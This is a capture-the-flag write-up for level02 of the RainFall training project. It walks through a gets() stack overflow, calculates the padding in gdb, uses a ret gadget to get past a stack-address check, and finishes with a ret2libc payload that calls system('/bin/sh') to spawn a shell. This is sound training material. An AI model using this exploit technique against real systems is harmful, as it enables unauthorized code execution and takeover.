Welcome to RainFall
๐ Level02 of Rainfall Project ๐
๐ Introduction
Hello, today Iโm gonna show you the my read-me of the level02 of rainfall project from 42 school.
๐ฌ Research & Analysis
So, first of all we have a binary named โlevel2โ we can use objdump to disassemble it.
Once finished you should have the following output
1 | level2@RainFall:~$ objdump -M intel -d ./level2 |
๐ก Key Observations:
- There are two functions:
main
andp
. - Inside function
p
, we see a call togets()
๐. - The
gets()
function is deprecated โ because it does not check input size, making it vulnerable to buffer overflow attacks.
By the way, a usage of gets
function is unsafe, you can overwrite EIP register and as you know the EIP register is a instruction pointer like (Program Counter PC on RISC architecture) is just a simple register which point to the next current instruction will be executed by the cpu.
You can see that in your gdb with gef
or peda
extension or even in gdb by default.
So if we arrive to overwrite the EIP register we can control the flow execution of the program.
1 | (gdb) info frame |
๐น Find the padding
To find the padding we can use the
info frame
directive to show the argument list and the saved of the EIP register.If we take the arguments list and substract 4 bytes we find the address of the saved EIP on the stack.
When you have this address you can just substract it with the buffer address, we can just get it after the call of the gets@plts instruction.
1 | 0x080484f2 in p () |
As you can see in the eax register there is the buffer address we have passed to the first parameters to the gets function.
Now, we can substract the address on the stack which pointed to saved eip with the buffer address.
1 | (gdb) p/d 0xbffff72c - 0xbffff6dc |
Now we know the padding you can just experiment with this payload for example
1 | run < <(python -c "print('A'*80+'B'*4)") |
If we run the following command and you check the frame just before a ret instruction you can see the saved of eip has been overwrited.
The binary is compiled without stack protection (canary not found).
The gets() function is used, which does not limit input size, leading to buffer overflow.
By overflowing the buffer, we can control the return address and execute arbitrary code.
๐ก๏ธ Protection condition
The following binary have a stack protection, if a stack prefix address is detected in the buffer provided with theses following two instructions
1 | 80484fb: 25 00 00 00 b0 and eax,0xb0000000 |
Then a call to _exit
is performed.
there is a big problem because the system address is on the stack and also have the same prefix, so to bypass this protection we just put an address of a gadget. For example the ret instructon from the p function also the ret instruction than we continue the flow execution of our payload chain.
Finally, you just need to find the system and binsh addresses on the libc, and use a 16-byte address to avoid segfaulting with the system function.
1 | (gdb) find 0xb7e2c000, 0xb7fd2000, "/bin/sh" |
๐ฎ Gadget
ret
gadget at0x0804854b
system
gadget at0xb7e6b060
exit
gadget at0xb7e5ebe0
- string
/bin/sh
at0xb7f8cc58
๐ Exploitation
You can finally run the following exploit manualy or using the python script which use pwntools library
1 | level2@RainFall:~$ (python -c "print '\x42' * 80 + '\x08\x04\x85\x4b'[::-1] + '\xb7\xe6\xb0\x60'[::-1] + '\xb7\xe5\xeb\xe0'[::-1] + '\xb7\xf8\xcc\x58'[::-1]"; cat) | ./level2 |
Using Python script donโt forget to install pwntools with this following command:
1 | python3 -m pip install pwntools |
1 | #!/usr/bin/env python3 |